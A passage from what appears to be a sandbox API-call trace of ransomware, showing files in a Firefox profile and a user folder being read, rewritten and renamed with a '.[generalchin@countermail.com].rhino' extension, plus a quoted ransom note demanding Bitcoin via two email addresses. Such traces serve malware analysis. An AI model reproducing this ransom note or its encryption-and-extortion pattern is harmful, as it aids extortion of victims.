lpNumberOfBytesWritten=0x2cfa04*=0x18120, lpOverlapped=0x0) returned 1 [0104.195] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0104.195] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.196] CloseHandle (hObject=0x104) returned 1 [0104.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0104.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x722910 [0104.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0104.201] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0104.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722788 | out: hHeap=0x6d0000) returned 1 [0104.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0104.235] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0104.235] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.236] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0104.236] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0104.236] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0104.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.236] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.236] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x6f [0104.236] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18f, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.236] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.237] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.238] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.238] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x6f, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x6f, lpOverlapped=0x0) returned 1 [0104.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.238] GetLastError () returned 0x0 [0104.238] SetLastError (dwErrCode=0x0) [0104.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.238] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6f) returned 0x72a920 [0104.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.239] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.240] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0104.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.240] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75ef78 [0104.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.240] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18f) returned 0x75f208 [0104.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.240] WriteFile (in: hFile=0x104, lpBuffer=0x75f208*, nNumberOfBytesToWrite=0x18f, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f208*, lpNumberOfBytesWritten=0x2cfa04*=0x18f, lpOverlapped=0x0) returned 1 [0104.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0104.240] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.240] CloseHandle (hObject=0x104) returned 1 [0104.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75ef78 [0104.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75f208 [0104.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.245] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0104.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0104.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0104.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0104.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x75ef78 [0104.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x75f000 [0104.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.249] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0104.249] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0104.250] CloseHandle (hObject=0x104) returned 1 [0104.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f000 | out: hHeap=0x6d0000) returned 1 [0104.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nEi dQUS.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nei dqus.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.251] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x63b3 [0104.251] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x64d3, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.251] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.251] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.252] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.253] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x63b3, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x63b3, lpOverlapped=0x0) returned 1 [0104.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.253] GetLastError () returned 0x0 [0104.253] SetLastError (dwErrCode=0x0) [0104.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63d6) returned 0x75ef78 [0104.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x765358 [0104.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x765460 [0104.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765358 | out: hHeap=0x6d0000) returned 1 [0104.254] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.257] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x64d3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.257] CloseHandle (hObject=0x104) returned 1 [0104.257] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x765358 [0104.257] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7655e8 [0104.259] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa185, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.259] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.259] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.260] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.261] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa065, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa065, lpOverlapped=0x0) returned 1 [0104.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.261] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.261] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.263] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa185, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.263] CloseHandle (hObject=0x104) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0104.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x769008 [0104.264] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x501b, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.265] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.265] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.266] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.266] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x4efb, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x4efb, lpOverlapped=0x0) returned 1 [0104.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.267] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.267] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.267] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.269] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x501b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.269] CloseHandle (hObject=0x104) returned 1 [0104.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x763ea0 [0104.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0104.271] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe2e9, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.271] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.272] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.273] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.312] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe1c9, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe1c9, lpOverlapped=0x0) returned 1 [0104.313] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.313] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.313] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.313] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.313] GetLastError () returned 0x0 [0104.313] SetLastError (dwErrCode=0x0) [0104.313] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.313] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe1ec) returned 0x72bfe8 [0104.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x73a1e0 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x73a2e8 [0104.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a1e0 | out: hHeap=0x6d0000) returned 1 [0104.317] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x73a1e0 [0104.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x73a470 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a1e0 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x73a550 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a470 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x73a698 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a550 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x73a880 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a698 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x73ab50 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a880 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x73a470 [0104.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ab50 | out: hHeap=0x6d0000) returned 1 [0104.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x73aab8 [0104.319] HeapFree 